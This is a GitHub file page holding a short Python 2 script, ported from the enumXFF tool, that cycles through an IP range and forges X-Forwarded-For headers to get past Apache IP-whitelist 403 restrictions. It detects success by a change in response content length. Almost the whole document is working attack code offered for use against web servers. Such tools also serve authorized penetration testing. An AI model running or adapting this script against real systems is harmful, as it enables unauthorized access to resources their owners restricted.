-
Notifications
You must be signed in to change notification settings - Fork 23
Expand file tree
/
Copy pathbypass_apache_ip_whitelist.py
More file actions
executable file
·64 lines (50 loc) · 1.74 KB
/
bypass_apache_ip_whitelist.py
File metadata and controls
executable file
·64 lines (50 loc) · 1.74 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#!/usr/bin/env python2.7
'''
This script is python 2 based version of the python 3 script located at
https://github.com/infosec-au/enumXFF
'''
###########
# IMPORTS #
###########
from __future__ import print_function
import argparse
import sys
import iptools
import requests
from tqdm import tqdm
#############
# FUNCTIONS #
#############
def error(*objects):
print("[!]", *objects, file=sys.stderr)
def info(*objects):
print("[+]", *objects, file=sys.stdout)
########
# MAIN #
########
if __name__ == '__main__':
desc = 'Enumerating IPs in X-Forwarded-Headers to bypass 403 restrictions.'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument("-t", "--target",
help="Restricted URL (target)", required=True)
parser.add_argument("-cl", "--badcl",
help="Restricted URL Content Length", required=True)
parser.add_argument("-r", "--range",
help="IP range i.e. 0.0.0.0-255.255.255.255",
required=True)
args = parser.parse_args()
ip_start, ip_end = args.range.split("-")
ip_range = iptools.IpRange(ip_start, ip_end)
for ip in tqdm(ip_range, leave=True):
try:
ip_list = ("{0}, ".format(ip) * 50)[:-2]
x_forwarded_for_header = {"X-Forwarded-For": ip_list}
response = requests.get(args.target, headers=x_forwarded_for_header)
if response.headers['content-length'] > args.badcl:
print("")
info("Access granted with header: \n{0}".format(x_forwarded_for_header))
break
except KeyError:
error("No Content-Length header contained in request to {0}"
.format(ip))
print("")